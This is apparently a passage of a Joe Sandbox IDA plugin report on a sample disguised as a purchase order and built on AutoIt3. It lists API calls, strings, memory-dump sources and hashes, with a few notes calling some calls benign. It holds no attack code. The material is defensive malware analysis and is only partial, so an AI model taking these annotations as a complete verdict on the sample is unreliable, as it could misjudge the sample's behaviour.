                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _strncmp
                                                            • String ID: Q\E
                                                            • API String ID: 909875538-2189900498
                                                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                            APIs
                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                               • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                             Note: OleSetContainedObject together with the Container and AutoIt3GUI strings is OLE/ActiveX object-hosting code; the AutoIt3GUI string indicates the sample was built with the AutoIt3 runtime, so the VariantCopy/VariantClear handling here belongs to the interpreter's GUI object support rather than to the payload.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 2652923123-3941886329
                                                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: U$\
                                                            • API String ID: 2666721431-100911408
                                                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • __wcsnicmp.LIBCMT ref: 00467288
                                                             • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                             Note: WNetUseConnectionW maps a network resource to a local device name; the case-insensitive prefix compare (__wcsnicmp) against the LPT string is consistent with the function accepting printer ports as well as drive letters as the local name.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                            • String ID: LPT
                                                            • API String ID: 3035604524-1350329615
                                                            • Opcode ID: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                                            • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                            • Opcode Fuzzy Hash: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                                            • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$h
                                                            • API String ID: 4104443479-677774858
                                                            • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                            • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                            • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                            • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID: &
                                                            • API String ID: 2931989736-1010288
                                                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00466825
                                                             • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                             Note: _wcslen supplies the dwUrlLength argument; InternetCrackUrlW then splits the URL into its scheme, host, port, user name, password, path and extra-info components (URL parsing, not network activity by itself).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_wcslen
                                                            • String ID: |
                                                            • API String ID: 596671847-2343686810
                                                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                            APIs
                                                             • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446 (0x1132 = TVM_INSERTITEMW)
                                                             • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F (0x1105 = TVM_GETCOUNT)
                                                             Note: both messages target a TreeView control (insert an item, then read the item count); this is GUI control handling, not a suspicious primitive.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                            APIs
                                                            • _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                             • _sprintf.LIBCMT ref: 0040F9AE
                                                             Note: _strlen for the input length, _memmove to grow the output buffer and _sprintf with the "%02X" format is the standard binary-to-hex-string conversion loop (two upper-case hex digits per input byte).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_sprintf_strlen
                                                            • String ID: %02X
                                                            • API String ID: 1921645428-436463671
                                                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                            • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                            • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                            • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                            • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                            • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                            • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                            • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                            • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                            • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: htonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 3832099526-2422070025
                                                            • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                            • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                            • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                            • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: InternetOpen
                                                            • String ID: <local>
                                                            • API String ID: 2038078732-4266983199
                                                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                            • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: u,D
                                                            • API String ID: 4104443479-3858472334
                                                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
